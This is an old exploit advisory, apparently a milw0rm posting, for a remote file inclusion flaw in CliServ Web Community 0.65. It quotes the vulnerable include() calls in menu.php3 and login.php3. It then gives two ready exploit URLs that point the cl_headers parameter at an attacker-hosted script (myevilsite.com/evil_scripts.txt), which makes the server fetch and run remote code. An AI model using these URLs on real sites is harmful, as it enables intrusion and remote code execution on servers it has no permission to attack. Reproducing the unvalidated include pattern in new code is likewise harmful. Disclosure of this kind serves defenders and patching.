/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- CliServ Web Community <= 0.65 (cl_headers) Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: CliServ Web Community v. 0.65
- [Script site: http://sourceforge.net/projects/cliserv/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Find by: Kacper (a.k.a Rahim)
+
- Contact: kacper1964@yahoo.pl
- or
- http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx
-
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Z Dedykacja dla osoby,
- bez ktorej nie mogl bym zyc...
- K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
/*
vulnerable code => menu.php3 line 4-8 — `$cl_headers` is passed to include() without being assigned or validated first, so a request parameter of the same name (register_globals behaviour, as the URLs below rely on) decides which file, local or remote, gets executed:
....
include($cl_headers);
$query = "DELETE FROM cl_notice WHERE n_expire < ". time();
$result = db_exec($connection, $query);
if($cl_loggedin == "2") {
....
++++++++++++++++++++++++++++++++++++++++++++++++++
vulnerable code => login.php3 line 4-8 — same unvalidated include() pattern; note that the quoted source reads `$cl_header` (singular) while the URL below uses `cl_headers`, so one of the two is likely a transcription error and both names are worth watching for in request logs:
....
include($cl_header);
?>
<FORM METHOD="POST" ACTION="index.php3">
....
++++++++++++++++++++++++++++++++++++++++++++++++++
*/
#Exploit:
http://www.site.com/[CliServ_path]/menu.php3?cl_headers=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[CliServ_path]/login.php3?cl_headers=[http://www.myevilsite.com/evil_scripts.txt]
# milw0rm.com [2006-08-25] |